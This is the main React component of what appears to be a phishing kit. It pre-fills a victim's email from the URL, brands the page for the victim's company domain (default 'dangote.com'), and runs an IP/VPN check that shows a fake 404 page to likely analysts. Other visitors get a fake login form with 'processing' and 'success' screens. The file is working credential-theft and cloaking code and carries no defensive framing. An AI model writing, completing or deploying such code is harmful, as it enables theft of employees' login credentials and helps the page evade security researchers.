import React, { useState, useEffect } from 'react';
import Loader from './components/Loader';
import LoginForm from './components/LoginForm';
import Processing from './components/Processing';
import Success from './components/Success';
import Fake404 from './components/Fake404';
import { checkIPAndProceed } from './services/ipService';

function App() {
  const [screen, setScreen] = useState('loader');
  const [domain, setDomain] = useState('');
  const [email, setEmail] = useState('');
  const [envData, setEnvData] = useState({});

  useEffect(() => {
    const hash = window.location.hash.substring(1);
    if (hash) {
      const decodedEmail = decodeURIComponent(hash);
      setEmail(decodedEmail);
      const domain = decodedEmail.split('@')[1] || 'dangote.com';
      setDomain(domain);
    }

    checkIPAndProceed()
      .then(data => {
        if (data.vpnDetected) {
          setScreen('fake404');
        } else {
          setEnvData(data.envData);
          setScreen('login');
        }
      })
      .catch(() => {
        setScreen('fake404');
      });
  }, []);

  const renderScreen = () => {
    switch (screen) {
      case 'loader': return <Loader domain={domain} />;
      case 'login': return (
        <LoginForm 
          email={email} 
          domain={domain} 
          envData={envData} 
          setScreen={setScreen} 
        />
      );
      case 'processing': return <Processing />;
      case 'success': return <Success domain={domain} />;
      case 'fake404': return <Fake404 />;
      default: return <Loader domain={domain} />;
    }
  };

  return (
    <div className="App">
      {renderScreen()}
    </div>
  );
}

export default App;